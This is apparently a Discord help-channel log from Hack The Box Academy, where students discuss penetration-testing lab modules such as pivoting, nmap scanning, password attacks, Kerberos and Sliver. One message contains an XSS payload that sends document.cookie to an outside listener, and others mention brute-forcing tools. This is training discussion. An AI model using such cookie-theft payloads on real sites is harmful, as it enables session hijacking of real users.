I really like when modules have the hard af question at the end designed to make you use what you've learned cumulatively

#

I really hate these kinds of questions where it's just one-off knowledge that I can google

fathom pendant
#

Meh

#

It's why I love being able to just fuck around in my cybersec classes kek I just guess 90% of the answers and I'm right 98% of the time

#

The other 2% is either
1] i didn't read
2] i don't know

sharp panther
#

why does the privesc module suck so bad

fathom pendant
#

Because you didn't eat all your veggies growing up

sharp panther
#

fair

#

i am a little weakling

pine dune
#

shits been downloading for the past 10 mins smh

fathom pendant
#

Why not just git clone it?

pine dune
#

had errors when I tried

fathom pendant
#

Skill issue

pine dune
#

😦

sharp panther
#

u can do it!

foggy monolith
waxen totem
#

ghost ping 👀

foggy monolith
hidden raptor
#

Working on enterprise network right now on the first pivoting chapter, having some trouble getting proxychains to work. I'm using -D 9050 so it's set to what's in proxychains.conf at default, but it doesn't follow the routes when i ping the hosts or use nmap

fathom pendant
#

This is why I use ligolo

hidden raptor
#

ah-

fathom pendant
#

Ping and fping work just fine

#

It's not the fact they can't go through ports, it's the protocol in use that's the issue

#

Socks proxy is annoying

hidden raptor
#

probably because they don't specify Pn though for some reason

fathom pendant
#

Don't share screenshots of modules above tier 0

hidden raptor
#

yeah just saw that

fathom pendant
#

Also you should be doing the module blind if you're doing the cpts path

#

As everything you'll encounter will have been taught in some form in the modules preceding it

hidden raptor
#

true!

fathom pendant
#

Blind == spin up the target, don't even read questions

#

Since the module itself is a walkthrough

honest crane
#

How do I display filtered ports in an Nmap scan? I know that my target IP has certain ports filtered (reason = no response), but when I run a -p- scan, it just won't display them and I can't find an option to make that happen.

fathom pendant
#

I don't think -sn scans ports

fathom pendant
honest crane
fathom pendant
#

What module and section are you working on?

honest crane
#

I did finish it, but I had to lookup the forum discussion for a nudge, since the port I’m supposed to be connecting to doesn’t appear in a regular Nmap scan (nor is it specified in the challenge description)

fathom pendant
#

If you read the ids/ips evasion section it refers to dns

honest crane
#

Yeah finding the technique was not the problem there

fathom pendant
#

Instead of specifying the exact port [as in the example] it should show up with -p-

honest crane
fathom pendant
#

That bit isn't mutable

#

It's due to common firewall misconfigurations

#

Also if you trip the detection system you're locked out of interacting with it anyway

#

It's not a t0 module iirc also sharing ss of a skill assessment is spoiling

#

Point is; try a -p- scan with source port

#

Also do a Syn Scan

#

Source-port btw isn't the -p option

#

--source-port tells nmap to use a specific port from your device instead of arbitrary one that a normal connection would do

jolly widget
south radish
#

Why is nxc so slow on ftp? I ran it in password mutations section and it sends 1 request every 5 seconds

#

While hydra has normal speed so it is not about vpn/internet speed

gaunt temple
#

Module: Introduction to Windows Evasion Techniques
Section: Skills Assessment I

Can I DM somebody about this? kinda stuck and need some help

potent sandal
#

hey guys whats up... iam stucked in password attacks / Network Services is it normal that he dont react to this. Yesterday i had the issue that he had a timeout in checking the password with the user names and now he show me this. ┌──(kali㉿kali)-[~/files]
└─$ ping 10.129.146.130
PING 10.129.146.130 (10.129.146.130) 56(84) bytes of data.
64 bytes from 10.129.146.130: icmp_seq=2 ttl=127 time=67.0 ms
64 bytes from 10.129.146.130: icmp_seq=3 ttl=127 time=61.7 ms
^C
--- 10.129.146.130 ping statistics ---
3 packets transmitted, 2 received, 33.3333% packet loss, time 2021ms
rtt min/avg/max/mdev = 61.652/64.328/67.005/2.676 ms

┌──(kali㉿kali)-[~/files]
└─$ crackmapexec winrm 10.129.42.197 -u username.list -p password.list

#

he show me nothing backs and thats it

#

when i run evil-winrm shows me also an error evil-winrm -i 10.129.42.197 -u john
Enter Password:

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

Error: An error of type Errno::EHOSTUNREACH happened, message is No route to host - No route to host - connect(2) for "10.129.42.197" port 5985 (10.129.42.197:5985)

Error: Exiting with code 1

long kestrel
steel owl
#

Guy's I'm looking for a remote cybersecurity internship , can anyone help with that

dark hedge
#

@versed eagle please don't post solutions for module questions

versed eagle
dark hedge
#

you may ask someone to DM you

versed eagle
#

Aight, can anyone DM me related to the TE.CL lab in the HTTP Attacks module? I solved it, but I don't really understand the way it's described in the solution

glad frost
#

Hi everyone,
I'm working on Exploiting XSS via WebSockets section. I know that ||InnerHTML is used||. Hence, I'm using the following payload:
||<img src='x' onerror='fetch("http://10.10.14.190:8001/exfil?data=" + encodeURIComponent(document.cookie))'||

However, I can't obtain the admin's cookie. If someone could provide a hint, I would appreciate it as I didn't get the hint on the section.
Link: https://academy.hackthebox.com/module/231/section/2487

mint solstice
#

can someone help me with Intro to C2 Operations with Sliver -> Skills Assessment-> Q3 Escalate your privileges and submit the contents of the flag.txt file on the Administrator's desktop on the domain controller I can't find the way to DC. Found a user on the machine but I don't know how to use it

tranquil axle
mint solstice
tranquil axle
#

Sure

north light
#

Hello i am facing an issue with that:
https://academy.hackthebox.com/module/295/section/3371

When i am trying to give the answer it say is not correct, but there is also writed inside the module i think anyway the answer i am giving is correct could i talk with somebody?

rough violet
#

yo,
in the common protocol section in Networking Fundamentals module
why is DNS mentioned under both TCP as well as UDP ?
as far as i recall from a networking course it was mentioned that DNS uses UDP as there will be a lot of overhead which is not necessary for mere domain name resolving

ancient niche
#

Good Afternoon guys someone do you know how can i run this command here?

quick cosmos
#

Why i can't send a pic here

acoustic owl
quick cosmos
#

Cool got it

acoustic owl
ancient niche
#

mmm

quick cosmos
#

Why I'm getting this error ? This is a unconstrained delegation users- section in kerebros attack. the tool is krbrelayx

dapper moth
#

If it's not getting the ticket, you have to specify the target with --target

rough violet
rough violet
rustic sage
#

@rough violet

#

@astral vault

#

sry for ping

autumn kindle
#

Hello,

I hope you’re doing well. I’m currently working on the Academy track for brute-forcing a web service.

I successfully brute-forced the SSH user, no issues there.
I’ve scanned all the ports on the machine, but I don’t see any FTP service.
Just in case, I’m wondering if a banner might be returning the wrong fingerprint. I created a script to brute-force each open port using Medusa.

I just wanted to ask for a hint:
I’ve found several authentication portals on the machine, and I’m wondering if I should focus on crafting FORM requests with Medusa instead to complete the exercise?

Thank you in advance!

rustic sage
#

Hmm

#

and ?

autumn kindle
#

Wrong path?

rustic sage
rustic sage
autumn kindle
hasty rock
#

good evening

I want to ask about the Network Enumeration with Nmap module

is this host discovery and host port scanning part really an error? because in the host discovery module there is no IP given to find what OS is being used and in the port scanning the IP is active but the available TCP IP cannot be searched

#

Can anyone help me ?

rustic sage
hasty rock
rustic sage
#

But I think you are getting an error here

spiral sinew
rustic sage
ancient niche
#

someone can help me with this please?

rustic sage
ancient niche
#

what?

rustic sage
#

what

ancient niche
#

?

hasty rock
#

@spiral sinew @rustic sage thankyou

tranquil axle
ancient niche
#

but

#

this is impossible run in velociraptor

#

with these exercirse

acoustic owl
#

I think if the module tells you to use cURL, then you can use the PwnBox

hasty rock
dapper moth
#

You can run in your own terminal

hasty rock
north light
carmine delta
#

hello I am doing the medium lab of the password attacks section and I would like to know I must obtain root

I obtain a private ssh key in the user folder "dennis"

why does this key allow me to connect as root root@ip -i id_rsa when it is the key found in the personal directory of dennis which does not have elevated privileges

unreal hill
#

HI

#

Im stuck on a question in Introduction to penetration testing

#

The question is what is the first ethical principle

#

I put in Do No Harm but its saying that its incorrect

fiery berry
#

are you coping/pasting the command shown in the section? If yes, that doesn't work. Check the IP address and port when spawning the target and adjust the command to your needs.

spare dome
#

yow

fiery berry
#

The command looks fine the gobuster one, however as I already said you need to use the port specified next to the target IP. Is the target port 81?

mossy igloo
#

Hello

#

Can u give me blooket hacks for all tokens

#

For a video

#

U know

#

/rank

tardy aurora
#

👋🏾

grave latch
#

hi, is it possible to restart a modules of the beggining and "erase" progress ?

autumn pilot
#

Erasing progress - no, there was a browser plugin created by one of the people in the community that hides the submitted answers

grave latch
#

oh ok can you tell me the plugin name pls ?

autumn pilot
#

I don't recall, but if you verify your account in the server you might find it in some of the channels

grave latch
#

ok thanks sir

dark hedge
ancient niche
#

guys someone completed intro to academy's purple modules?

autumn kindle
#

Any hint for my question just before. Stuck.
Medusa for brute force ftpuser but in the opening port, nothing in ftp.

ancient niche
autumn kindle
safe star
#

It required multiple restarts for me

autumn kindle
#

Ok thanks. 👊

severe lagoon
#

Hi, I have been trying the wordpress hacking module. But I am stuck at the beginning of it. Can someone help me out.

glossy cloak
mint solstice
#

anyone could give me a hint for fourth question on Sliver's skill assessment?

dapper moth
mint solstice
#

I am already on dc with that user

dapper moth
#

Ohh. My bad... Noted the wrong order of flags

#

Did you dump DC02?

mint solstice
#

Yes, I run lsadump

dapper moth
#

Then the jump is easy.... Simple ticket crafting if you know what I mean

#

Might be a double hop problem if your strictly using Sliver

dapper moth
#

Sure

karmic vapor
#

Hello 👋🏾 everyone

#

I'm new here

#

It's very exciting to be here with you guys

#

I'm hoping to learn a lot from everyone

sinful narwhal
#

please help me on this

Cross-Site Scripting (XSS) / Phishing

getting error: Issue in sending URL!

autumn kindle
fathom pendant
#

Don't spoil skill assessments

granite rune
#

Bro

#

I need hacking lessons

compact patrolBOT
gritty plaza
#

hello.

fathom pendant
gritty plaza
#

I am doing the getting started Module and on the public exploits section

#

Am I getting distracted with the server being apache and trying to find an exploit for it?

fathom pendant
#

Did you visit the web page?

fathom pendant
#

You want to target the underlying service as a last resort

gritty plaza
#

Hence why the hint says search for plugin exploit

fathom pendant
#

Bingo

#

And hence my tip: did you visit the webpage?

#

:)

#

It'll be hard to miss

gritty plaza
#

Yes and that was my problem. I got so distracted with the the apache running on an odd port that I didn't do the basic thing and that is visiting the webpage

fathom pendant
#

It'll hit you like a ton of bricks iirc it's literally in big bold letters as soon as you go on it

gritty plaza
#

I need to not get tunnel vision

fathom pendant
#

It happens

gritty plaza
#

one more thing. When I set the LHOST can I set it to tun0 like it has in the examples?

fathom pendant
#

set lhost tun0

#

But that's if the exploit even uses the lhost variable

#

If it doesn't use/require it, no need to set it

#

Also the example isn't gonna be 1::1 of what you're gonna do for the practical

#

The example is there to show you a line of thought process

trim harness
#

Linux Fundamentals, Filter Contents, Q3: Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.

Should I be able to get to the webpage on Safari from inside the instance? I'm just learning curl and I've tried several commands I found from searching Google, but even when I do just curl https://www.inlanefreight.com, I get curl: (28) Failed to connect to www.inlanefreight.com port 443 after 133234 ms: Couldn't connect to server. Is this a user error situation, or is my spawned instance not connecting to the URL like it's supposed to?

fathom pendant
#

Could be a pwnbox restriction being dumb

#

You can use your own vm to do this exercise

#

Either way it's a pita

trim harness
#

pita?

fathom pendant
#

Pain in the ass

#

As it requires some web knowledge, and regex

trim harness
#

ah, haha got it

fathom pendant
#

To copy/paste from the forum https://forum.hackthebox.com/t/linux-fundamentals-filter-content-filter-all-unique-paths-of-domain/270162
||I completed this exercise with the following command :

curl -s https://www.inlanefreight.com | tr -d \'\" | grep -o -E "(href|url|src)=[^ >]+" | cut -d '=' -f 2 | grep -vE ".*(defer|\.org|google|themeansar).*" | cut -d "?" -f 1 | sort | uniq | tee /dev/stderr | wc -l

Let me explain each step :

curl -s https://www.inlanefreight.com
This get the URL content but without metrics output automatically added by curl when it outputs the result. These metrics will get insert before and in the middle of fetched data if not ignored.

tr -d \'\"
URL and other HTML elements parameter’s values can be encapsulated between either quote or double quotes or not encapsultated at all. So, to making parsing easier, I prefer removing them.

grep -o -E "(href|url|src)=[^ >]+"
In HTML, URL are given in href, url or src elements. So I use a grep to retrieve the attribute and its URL value ONLY thanks the regex stopping at first space or > met.

cut -d '=' -f 2
Now, I am left with attributes having the following structure : (href|url|src)=url
So, I split each entry using the = delimiter and keeping only the url.

grep -vE ".*(defer|\.org|google|themeansar).*"
Now, I have all available URLs but not all are part of the target domain. So I use the -v grep option to keep only strings not matching the given regex where I specified specific words found in url I wanted to ignore.

cut -d "?" -f 1
URL may have query strings. A url points to a resource but this resource may be a script taking parameters to give us the right result. As the exercise asks us to count unique url in the domain, we have to ignore query strings / parameters. So I split urls using the ? delimiter as this is the character used to indicate start of the query string and I keep only the first part.

sort | uniq | tee /dev/stderr | wc -l
Finally, I just need to sort found urls with the sort command, remove duplicates with the uniq command and count lines with wc command to get the result.||

fathom pendant
# trim harness ah, haha got it

I cheated when I went through it and looked up a forum answer because it was just straight annoying (and trying to get chatGPT to do it is like pulling teeth)

#

By far one of the more out of place sections in an intro module

trim harness
#

I found that one too, it gives me an answer of 0. That's why I was thinking it's a connection issue with the instance

#

thanks anyway

fathom pendant
#

I suggest just setting up your own vm, it'll be better in the long run

gritty plaza
#

When I run the exploit, am I supposed to be given a terminal, does it supposed to download a file?

cloud urchin
#

that depends on the exploit

gritty plaza
#

the exploit for the wordpress simple backup plugin

cloud urchin
#

if it's on nibbles i don't think so but i can't remember tbh. a lot of times the exploit will have some comments or a github page describing what it does.

gritty plaza
#

I am reading about the exploit on rapid7

#

it seems all I do is set the RHOSTS and run the exploit

cloud urchin
#

try reading the contents of the exploit file itself

gritty plaza
#

I got it and I see where I made the mistake

#

I was thinking the flag was going to be in the filepath that was set by the exploit but the instructions tell you where to look 😛

#

I also do not like where the file is downloaded. I am sure I can change that

fathom pendant
#

You sure can

#

But at least it tells you

gritty plaza
#

yes, true

solid rivet
#

Hi I'm new to cyber security so can you help me

compact patrolBOT
solid rivet
#

I'm done reading anything else

cloud urchin
#

your reading speed and comprehension is superhuman, you'll have no trouble absboring the material in academy

solid rivet
#

Yeah

#

Academy?

fathom pendant
solid rivet
#

Oh so I just have to click on it

solid rivet
#

Is it only reading

fathom pendant
#

No

#

The other link i sent is to the academy training site where you can learn and practice things

solid rivet
#

Oh I read the definition of hacking and other stuff 14 pages

fathom pendant
#

kek i suggest actually taking the time to understand things not just actually reading and clicking next

solid rivet
fathom pendant
#

Academy has different learning modules that range from basic "web requests" to advanced "csrf"

solid rivet
#

There are a lot of classes

#

Which one to join?

fathom pendant
#

Whichever one appeals to you.

solid rivet
#

Hmmm

fathom pendant
#

I suggest the information security fundamentals skill path if you have 0 idea what linux is

long kestrel
#

it also has good networking and AD primers

solid rivet
#

I use windows

fathom pendant
#

It goes over basic linux, windows, ad, and networking

fathom pendant
#

As a lot of tools are compiled for Linux machines

solid rivet
fathom pendant
#

It's not impossible

#

But you'd have to find windows alternatives to some tools mentioned in the course

fathom pendant
#

Also don't suggest using your daily driver OS to hack, using a vm keeps your system more secure

solid rivet
#

Hack

fathom pendant
#

There's a setting up module that's a rough guide/reference to setting up your own vm

solid rivet
#

So how do I get linux

fathom pendant
#

Different distributions exist

#

Popular ones are kali and parrot

solid rivet
#

Do you use python

fathom pendant
#

Python isn't an OS, but I have written a thing or two in python

solid rivet
#

I know

#

OK I'm joining information security

long kestrel
#

hf

solid rivet
#

Where do I join

fathom pendant
#

Have fun, if you continuously ask questions that are explained in the reading i will not help you

fathom pendant
solid rivet
#

I'm a kid

#

So I'll be asking questions

fathom pendant
solid rivet
#

Ok

fathom pendant
#

If it's explained in the reading, then you shouldn't be asking about it

solid rivet
#

Yeah

fathom pendant
#

Also you'll need to fill out a parental consent form to use services since you admitted to being a minor

fathom pendant
#

It's in the ToS

fathom pendant
#

But not everything on academy is free

solid rivet
#

That's a relief

solid rivet
fathom pendant
#

Tier 0 modules are the free modules as they give back the cubes spent

#

Above tier 0 it's a 20% return on modules completed

solid rivet
#

I'm in 8th grade I don't have money

fathom pendant
#

If you want free learning, Google.

fathom pendant
#

You can ask parents about subscribing to academy as it's an interest

solid rivet
fathom pendant
#

You might be able to get support to approve you for the student discount

solid rivet
fathom pendant
#

$8/month and access to all modules up through tier2

fathom pendant
solid rivet
#

Yeah I know

#

I'll just stick to google

fathom pendant
#

If they don't want to support you learning something that interests you, that's between you and them

#

Free courses and Google can only get you so far in terms of quality

solid rivet
#

And videos

fathom pendant
#

I suggest also learning how to take proper notes

solid rivet
fathom pendant
#

Eh you don't need much programming skills tbh

#

My knowledge of python is rudimentary at best

solid rivet
#

That's ...

fathom pendant
#

Knowledge of php and js practically non-existent

#

I know enough to do what I need to

solid rivet
#

I do that in my leisure time

fathom pendant
#

It's a broad field kid, you'll find something that sticks more for you than others

long kestrel
#

@fathom pendant have you done the CWEE path?

fathom pendant
fathom pendant
solid rivet
#

Use my name

fathom pendant
#

I know I'm coming off as harsh, but that's the reality of it